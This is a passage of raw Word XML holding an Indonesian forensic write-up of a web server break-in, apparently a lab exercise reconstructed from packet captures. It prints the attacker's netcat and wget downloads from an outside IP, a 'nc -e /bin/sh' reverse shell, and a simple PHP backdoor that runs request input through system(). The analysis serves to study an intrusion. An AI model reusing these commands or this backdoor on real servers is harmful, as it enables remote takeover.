          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D298BFB" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>wym</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEBE7A3" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>cat index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E222EAE" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;?php @ob_start("ob_gzhandler");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3065BA94" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="49B392DC" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0915ECA0" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>version..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>1.1 r247 2010-02-23 20:10:00 $</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29235C6A" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>package..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>SkyBlueCanvas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9D2161" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>copyright.Copyright</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> (C) 2005 - 2008 Scott Edwin Lewis. All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43165C08" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>license..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ht</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>tp://opensource.org/licenses/gpl-license.php GNU Public License</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD577EC" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57666A7B" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> * other free or open source software licenses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0FD10B" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> * See COPYING.txt for copyright notices and details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD35D19" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A77A94" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="4B1621DC" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1DC133" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="2F8997EC" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="4C95FCC5" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>return ((float)$usec+(float)$sec);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310EE8B6" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24024B1C" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="07084578" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>@ob_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>flush(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635DCD54" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>nc 217.195.49.146 63129 &gt; cm0.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209B0D53" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="775ADBA7" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Dari interaksi tersebut, kita dapat melihat bahwa attacker melakukan beberapa hal. Pertama-tama, attacker melakukan perintah id untuk mengetahui user yang digunakannya. Lalu dia melihat list user (cat /etc/passwd), meliha</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">t current work directory (pwd), melihat isi </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>direktori sekarang (ls), untuk mengetahui root dari webserver, melihat isi index.php (cat index.php) dan membuat file cm0.php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A97FD7" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="489A43C8" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t xml:space="preserve">File yang baru saja dibuat (cm0.php) cukup mencurigakan. Karena itu, kami melakukan </w:t>
      </w:r>
      <w:r>
        <w:t>filter tcp contains “cm0.php” untuk mencari paket-paket yang berhubungan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6127200D" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4106102D" wp14:editId="20A77706">
            <wp:extent cx="5731200" cy="3060700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="image05.png" descr="screenshot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creenshot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058F1B" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Ternyata benar, setelah itu cm0.php banyak digunakan oleh attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314FC65E" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Jika kita lanjutkan melihat interaksi netcat lain (paket 85652), kita mendapatkan isi cm0.php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C79C988" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="473547E3" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6213B55E" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>uid=48(apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>) gid=48(apache) groups=48(apache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2921B230" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>cat cm0.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBDA984" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;!--</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> Simple PHP backdoor by DK (http://michaeldaw.org) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631CEAC4" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67675BC9" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>if(isset($_REQUEST['cmd']</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>)){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="03390E28" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">        echo "&lt;pre&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE0C9BB" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">        $cmd = ($_REQUEST['cmd']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A7E36D" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">        system($cmd);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CCAAEE" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">        echo "&lt;/pre&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC66099" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">        die;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E74BC40" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F66C808" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75149A38" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="326D42D7" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>dapat dilihat bahwa cm0.php adalah backdoor sederhana yang menerima input dari isi request di field cmd dan menjalankan perintah tersebut dan menampilkan outputnya.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AA0C8C" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="2AB0138E" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Jika kita lihat request-request yang dilakukan attacker ke cmd0.php (dari hasil filt</w:t>
      </w:r>
      <w:r>
        <w:t>er tcp contains “cm0.php”), kita mendapatkan perintah-perintah berikut ini yang dijalankan (isi dari field cmd dari request ke cm0.php)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEAE702" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AD08F3" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cat index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563D2838" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033CD34D" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F82D41D" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc 217.195.49.146 63129 &gt; fr.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69103DA4" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F19BD02" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cat fr.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0974B5F2" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc 217.195.49.146 63129 &gt;FrogSquad.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D74AB93" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE71C1D" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ls -l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> F*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402E6C16" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc 217.195.49.146 63129 &gt;FrogSquad.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF562E1" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ls -l F*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DF383E" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>wget http://217.195.49.146:63129/fr.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757D6894" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>wget http://217.195.49.146:63129/fr.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6721EF99" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF1A7E9" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ls -lrt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C35BA1" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>wget -?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019EFBFF" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>wget -? 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B360435" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>wge 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724C434A" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ls -l F*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BE519C" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ls -l fr*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4DC4E3" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc -e /bin/sh 217.195.49.146 63122</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6486EBA4" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270ACEBE" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AA1288" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ls -la 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B95DE7E" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8587F9" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t xml:space="preserve">Dapat dilihat bahwa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">attacker </w:t>
      </w:r>
      <w:r>
        <w:t>mendownload beberapa file dari servernya sendiri (FrogSquad.jpg, fr.html)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BE5390" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="5098C21C" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Setelah itu, attacker kembali melakukan netcat (paket 87596)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5B7D53" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Berikut perintah-perintah yang dilakukan (beberapa output dihilangkan karena terlalu banyak) (biru = input, hitam = output)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E381C3" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F600EA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3D8DDA23" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
